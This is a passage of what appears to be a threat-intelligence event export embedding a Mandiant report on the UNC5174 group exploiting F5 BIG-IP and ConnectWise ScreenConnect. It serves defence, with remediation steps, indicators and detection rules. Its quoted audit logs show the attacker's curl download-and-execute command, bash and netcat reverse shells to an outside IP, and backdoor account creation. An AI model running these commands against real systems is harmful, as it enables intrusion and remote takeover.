            "deleted": false,
            "disable_correlation": false,
            "object_relation": "references",
            "timestamp": "1760629191",
            "to_ids": false,
            "type": "link",
            "uuid": "eb46583c-115a-4a0a-bea2-ada2ee13c8db",
            "value": "https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/"
          }
        ]
      }
    ],
    "EventReport": [
      {
        "name": "Report from - https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect (1760619469)",
        "content": "Threat Intelligence\n\n# Bringing Access Back \u2014 Initial Access Brokers Exploit F5 BIG-IP (@[attribute](8a1470bb-cb48-4273-b708-3826281402d1)) and ScreenConnect\n\nMarch 21, 2024\n\n##### Mandiant\n\nWritten by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen\n\n---\n\nDuring the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of\u00a0@[attribute](8a1470bb-cb48-4273-b708-3826281402d1)\u00a0affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.\n\nMandiant assesses UNC5174 (believed to use the persona \"Uteus\") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for\u00a0China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following @[attribute](8a1470bb-cb48-4273-b708-3826281402d1) exploitation. In February 2024, UNC5174 was observed exploiting\u00a0ConnectWise ScreenConnect vulnerability\u00a0(CVE-2024-1709) to compromise hundreds of institutions primarily in the U.S. and Canada.\n\n## Targeting and Timeline\n\nUNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and\u00a0non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.\n\nThe actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.\n\n* ConnectWise ScreenConnect Vulnerability CVE-2024-1709\n* F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability @[attribute](8a1470bb-cb48-4273-b708-3826281402d1)\n* Atlassian Confluence CVE-2023-22518\n* Linux Kernel Exploit CVE-2022-0185\n* Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525\n\nInvestigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.\n\nFigure 1: UNC5174 global targeting map\n\n## Initial Disclosure of @[attribute](8a1470bb-cb48-4273-b708-3826281402d1)\n\nOn Oct. 25, 2023, Praetorian published an\u00a0advisory\u00a0and\u00a0proof-of-concept (PoC) for a zero-day (0-day) vulnerability (@[attribute](8a1470bb-cb48-4273-b708-3826281402d1)) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The\u00a0advisory\u00a0detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.\n\n## Evidence of Exploitation\n\nMandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited @[attribute](8a1470bb-cb48-4273-b708-3826281402d1) to perform actions on the appliance like account creation. The anomalous behavior appeared first in the \"***/var/log/audit***\" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:\n\n* ***/etc/passwd***\n* ***/etc/shadow***\n* The creation of the user's home directory was also replicated at\u00a0***/home/<username>***.\n\n```\nOct 28 01:52:32 localhost.localdomain notice tmsh[30629]: \n01420002:5: AUDIT - pid=30629 user=root folder=/Common \nmodule=(tmos)# status=[Command OK] cmd_data=create \nauth user f5support3 password **** shell bash partition-access \nadd { all-partitions { role admin } }\n\nOct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: \n01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common \nmodule=(tmos)# status=[Command OK] cmd_data=run util bash -c id\n```\n\nTable 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.\n\nThe \"***/var/log/restjavad-audit.log***\" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user \"***f5support3***\". The following log entries show the\u00a0***f5support3***\u00a0user executing bash commands. The body of the POST request contains the bash command being executed.\n\n```\n[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] \n{\"user\":\"local/f5support3\",\"method\":\"POST\",\"uri\":\"http://localhost:8100\n/mgmt/tm/util/bash\",\"status\":200,\"from\":\"154.12.177[.]8\"}\n\n[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] \n{\"user\":\"local/f5support3\",\"method\":\"PATCH\",\"uri\":\"http://localhost:8100\n/mgmt/shared/authz/users/f5support3\",\"status\":200,\"from\":\"154.12.177[.]8\"}\n```\n\nTable 2: UNC5174 bash commands with newly created username f5support3\n\nUNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:\n\n* F5support3\n* F5\\_admin\n* f5\\_support\n\n## Post-Exploitation Tactics by UNC5174 After Successful Account Creation\n\n### SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL\n\nUNC5174 leveraged their newly minted TMSH access to download and execute \"/tmp/watchsys\" using a cURL command. Mandiant's analysis of the file \"/tmp/watchsys\" identified it as a new 64-bit ELF downloader we have named\u00a0SNOWLIGHT.\n\nThe following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT:\n\n1. Delete any file previously written to /tmp/watchsys.\n2. Forcefully kill the process \"watchsys\" if it is running.\n3. Download the file from a remote URL to /tmp/watchsys.\n4. Modify the permissions of /tmp/watchsys to allow execution.\n5. Execute /tmp/watchsys using \"nohup\", so that the process will continue executing after the parent process is terminated.\n6. Perform a directory listing of the /tmp directory.\n\n```\nNov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: \n01420002:5: AUDIT - pid=17602 user=admin folder=/Common \nmodule=(tmos)# status=[Command OK] cmd_data=run util bash \n-c \"rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys \nhttp://172.104.124.74/LG;chmod 755 /tmp/watchsys;nohup \n/tmp/watchsys &;ls -al /tmp/\"\n```\n\nTable 3: UNC5174 cURL command to download SNOWLIGHT downloader\n\nFigure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method\n\nSNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key \"0x99\".\n\nFinally, the decoded secondary ELF file is loaded into memory using Linux's \"sys\\_memfd\\_create\" and executed via \"fexecve\". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of \"\". This is identifiable in a running process list as a \"memfd\" process.\n\nThe SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed\u00a0GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:\n\n* Process Name: memfd:a (deleted)\n* Path: empty (due to the executable being un-backed)\n* Args: ?\n* User: root\n\nGOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL.\n\nMandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.\n\n```\nNov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: \n01420002:5: AUDIT - pid=18778 user=admin folder=\n/Common module=(tmos)# status=[Command OK] cmd_data=run util \nbash -c \"bash -i /dev/tcp/172.104.124.74/443 0>&1 &\"|\n```\n\nTable 4: UNC5174 command to download a bash web shell\n\n```\nNov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: \n01420002:5: AUDIT - pid=18778 user=admin folder=/Common \nmodule=(tmos)# status=[Command OK] cmd_data=run util bash \n-c \"nc 172.104.124.74 443 -e /bin/bash &\"\n```\n\nTable 5: UNC5174 command to download a netcat web shell\n\n### Internal Reconnaissance\n\nShell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file \"/tmp/ss\" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.\n\n```\ncurl -o /tmp/ss hxxp://172.104.124.74/App-amd64linux-noupx\n```\n\n```\ncurl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases\n/download/v1.2.5/App-amd64linux-noupx\n```\n\nTable 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality\n\nThe file \"/tmp/ss\" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of \"/tmp/ss\" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool FSCAN.\n\n```\n./ss -i <Internal CIDR block>\n```\n\nTable 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances\n\n### GOHEAVY Tunneler: A Closer Look\n\nUNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string \"SpotUdp\" to existing network interfaces.\n\nThis behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous \"SpotUdp\" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network\n\nIn addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:\n\n* SLIVER client\n* FFUFP\n* SQLMAP\n* DIRBUSTER\n* METASPLOIT\n* AFROG penetration testing tool\n* NUCLEI vulnerability scanning templates\n\n### UNC5174 Closes the Door Behind Them\n\nMandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script \"mitigation.sh\". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:\n\n* bash execution @[attribute](8a1470bb-cb48-4273-b708-3826281402d1) command run for account root6 from (HK) 61.239.68.73\n* 28/10 14:16:23 deleted user root6\n* 28/10 14:27:35: ran command cmd\\_data=run /util bash -c /root/mitigation.sh -u\n* 4/11/2023 03:36:30 /tmp/.del\n\n## UNC5174 Targets ScreenConnect Vulnerability\n\nOn Feb. 21, 2024, the actor \"uteus\" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada.\n\nMandiant obtained the output of the actor's exploit, which showed the actor added the admin user \"cvetest\" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.\u00a0 Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.\n\nFigure 3: Geographic distribution of UNC5174 ScreenConnect targeting\n\n## Attribution\n\nMandiant has identified a new access operations group UNC5174 that uses the personas \"Uteus\" (alternate spelling \"uetus\") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including \"Dawn Calvary\" and \"Genesis Day\" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.\n\n### Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors\n\nMandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives \"Dawn Calvary\" and has collaborated with \"Genesis Day\" / \"Xiaoqiying\" and \"Teng Snake.\" This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.\n\nAs part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously\u00a0indicted\u00a0by the U.S. Department of Justice in 2020.\n\nOn Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym \"Uteus\", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described @[attribute](8a1470bb-cb48-4273-b708-3826281402d1) exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability @[attribute](9dcbe33e-2db4-43ec-a270-7b576e1bf402). Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a\u00a0public proof of concept\u00a0to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity \"Xiaoqiying,\" which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.\n\nFigure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government\n\nBased on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.\n\n## Outlook and Implications\n\nUNC5174 exploitation of @[attribute](8a1470bb-cb48-4273-b708-3826281402d1) as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.\n\n## Remediation and Hardening\n\nMandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:\n\n* Restrict access to the F5 TMUI from the internet.\n* Immediately apply the F5 mitigation script published in [K000137353] to any vulnerable F5 appliances.\n* Investigate vulnerable F5 appliances for evidence of compromise.\n\nIn the event of F5 compromise:\n\n* Review appliance configurations for unauthorized modifications.\n* Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.\n* Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.\n\nFor impacted ScreenConnect instances, Mandiant\u00a0recommends that organizations with an on-premises controller\u00a0read our latest ScreenConnect remediation and hardening guide.\n\n## Indicators of Compromise (IOCs)\n\n### Network IOCs\n\n|  |  |  |  |\n| --- | --- | --- | --- |\n| **IP Address** | **ASN** | **NetBlock** | **Location** |\n| 118.140.151[.]242 | 9304 | HGC Global Communications Limited | (HK) |\n| 61.239.68[.]73 | 9269 | Hong Kong Broadband Network Ltd. | (HK) |\n| 172.245.68[.]110 | 36352 | Colocrossing | (U.S.) |\n\n### URLs\n\n|  |  |\n| --- | --- |\n| **URL** | **Description** |\n| http://172.245.68[.]110:8888 | SUPERSHELL C2 |\n\n### Host IOCs\n\n|  |  |  |  |\n| --- | --- | --- | --- |\n| **MD5 Hash** | **Filename** | **Type** | **Code Family** |\n| c867881c56698f938b4e8edafe76a09b | LG | ELF | SNOWLIGHT |\n| df4603548b10211f0aa77d0e9a172438 | N/A | ELF | SNOWLIGHT |\n| 0951109dd1be0d84a33d52c135ba9c97 | N/A | ELF | SNOWLIGHT |\n| 9c3bf506dd19c08c0ed3af9c1708a770 | memfd:a | ELF | N/A |\n| 0ba435460fb7622344eec28063274b8a | undefined | ELF | SNOWLIGHT |\n| a78bf3d16349eba86719539ee8ef562d | N/A | ELF | SNOWLIGHT |\n\n### Host Based Indicators (Commands)\n\n```\ncmd_data=run util bash -c \"echo \ndG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= \n| base64 -d | sh\"  \"tmsh -q -c 'cd /;show running-config recursive'\"\nrun util bash -c \"bash -i /dev/tcp/172.104.124.74/443 0>&1 &\"\n```\n\n### Detections\n\n```\nrule M_Backdoor_GOREVERSE_2\n{\n        meta:\n                author = \"Mandiant\"\n                description = \"This rule is designed to detect events related \nto goreverse. GOREVERSE is a publicly available reverse shell\"\n                md5 = \"5c175ea3664279d6c0c2609844de6949\"\n                platforms = \"Windows,Linux,MacOS\"\n                malware_family = \"GOREVERSE\"\n        strings:\n                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B \n[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }\n                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 \n8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }\n                $cc_rssh = \"rssh\" fullword\n                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 \n[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }\n                $str1 = \"--[foreground|fingerprint|proxy|process_name] \n-d|--destination <server_address>\"\n                $str2 = \"-d or --destination Server connect back address \n(can be baked in)\"\n                $str3 = \"--foreground Causes the client to run without \nforking to background\"\n                $str4 = \"--fingerprint Server public key SHA256 hex \nfingerprint for auth\"\n                $str5 = \"--proxy Location of HTTP connect proxy to use\"\n                $str6 = \"--process_name Process name shown in \ntasklist/process list\"\n        condition:\n                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) \nor (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) \n== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d \nand uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) \nand (all of ($str*) or all of ($cc_*))\n}\n```\n\n```\nrule M_APT_Downloader_SNOWLIGHT_1 \n{\n        meta:\n                author = \"Mandiant\"\n                description = \"This rule is designed to detect \nthe SNOWLIGHT code family\"\n                md5 = \"0951109dd1be0d84a33d52c135ba9c97\"\n                platforms = \"Linux\"\n                malware_family = \"SNOWLIGHT\"\n        strings:\n                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 \n7C F2 48 63 D2 48 89 EE 44 89 E7 }\n                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 \n00 BF 3F 01 00 00 E8 8C FE FF FF }\t\n        condition:\n                uint32(0) == 0x464c457f and all of them\n}\n```\n\n## Mandiant Security Validation Actions\n\nOrganizations can validate their security controls using the following actions with\u00a0Mandiant Security Validation.\n\n|  |  |\n| --- | --- |\n| **VID** | **Name** |\n| A106-917 | Application Vulnerability - F5 BIG-IP 17.1.0, @[attribute](8a1470bb-cb48-4273-b708-3826281402d1), Exploitation |\n| A106-916 | Application Vulnerability - F5 BIG-IP 17.1.0, @[attribute](8a1470bb-cb48-4273-b708-3826281402d1), User Authentication |\n| A107-059 | Application Vulnerability - @[attribute](84027b76-5506-42f5-b092-c327d0ced665), Exploitation, Variant #1 |\n| A107-056 | Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1 |\n\n## MITRE ATT&CK\n\nMandiant has observed UNC5174 use the following techniques:\n\n|  |  |  |\n| --- | --- | --- |\n| Initial Access | T1190 | Exploit Public-Facing Application |\n| Defense Evasion | T1027 | Obfuscated Files or Information |\n|  | T1070.004 | File Deletion |\n|  | T1140 | Deobfuscate/Decode Files or Information |\n|  | T1222.002 | Linux and Mac File and Directory Permissions Modification |\n|  | T1601.001 | Patch System Image |\n| Discovery | T1016 | System Network Configuration Discovery |\n|  | T1049 | System Network Connections Discovery |\n|  | T1082 | System Information Discovery |\n|  | T1083 | File and Directory Discovery |\n| Command and Control | T1095 | Non-Application Layer Protocol |\n|  | T1105 | Ingress Tool Transfer |\n|  | T1572 | Protocol Tunneling |\n|  | T1573.002 | Asymmetric Cryptography |\n| Execution | T1059 | Command and Scripting Interpreter |\n|  | T1059.004 | Unix Shell |\n| Persistence | T1136.001 | Local Account |\n| Impact | T1531 | Account Access Removal |\n| Credential Access | T1003.008 | /etc/passwd and /etc/shadow |\n| Resource Development | T1608.003 | Install Digital Certificate |\n\nMandiant has observed UNC302 use the following techniques:\n\n|  |  |  |\n| --- | --- | --- |\n| Initial Access | T1133 | External Remote Services |\n|  | T1189 | Drive-by Compromise |\n|  | T1190 | Exploit Public-Facing Application |\n| Collection | T1213 | Data from Information Repositories |\n|  | T1560 | Archive Collected Data |\n|  | T1560.001 | Archive via Utility |\n| Persistence | T1505.003 | Web Shell |\n| Defense Evasion | T1027 | Obfuscated Files or Information |\n|  | T1036 | Masquerading |\n|  | T1070.004 | File Deletion |\n|  | T1112 | Modify Registry |\n|  | T1134 | Access Token Manipulation |\n|  | T1497 | Virtualization/Sandbox Evasion |\n| Impact | T1529 | System Shutdown/Reboot |\n| Execution | T1059.003 | Windows Command Shell |\n|  | T1059.005 | Visual Basic |\n|  | T1203 | Exploitation for Client Execution |\n| Discovery | T1012 | Query Registry |\n|  | T1016 | System Network Configuration Discovery |\n|  | T1057 | Process Discovery |\n|  | T1082 | System Information Discovery |\n|  | T1083 | File and Directory Discovery |\n|  | T1518 | Software Discovery |\n| Credential Access | T1003 | OS Credential Dumping |\n| Lateral Movement | T1021.001 | Remote Desktop Protocol |\n| Resource Development | T1583.003 | Virtual Private Server |\n|  | T1584 | Compromise Infrastructure |\n| Command and Control | T1071.001 | Web Protocols |\n|  | T1071.004 | DNS |\n|  | T1095 | Non-Application Layer Protocol |\n\nPosted in\n\n* Threat Intelligence\n\n##### Related articles\n\nThreat Intelligence\n\n### Oracle E-Business Suite Zero-Day Exploited in Widespread Extortion Campaign\n\nBy Mandiant \u2022 16-minute read\n\nThreat Intelligence\n\n### Cybercrime Observations from the Frontlines: UNC6040 Proactive Hardening Recommendations\n\nBy Mandiant \u2022 28-minute read\n\nThreat Intelligence\n\n### Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors\n\nBy Mandiant \u2022 29-minute read\n\nThreat Intelligence\n\n### ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (@[attribute](c7932fe2-0dc3-447b-a13d-dcc10ed64cc0))\n\nBy Mandiant \u2022 29-minute read",
        "id": "1912",
        "event_id": "357351",
        "timestamp": "1760619609",
        "uuid": "5a1a66d9-34bf-4a85-a915-3a84ec09e736",
        "deleted": false
      }
    ]
  }
}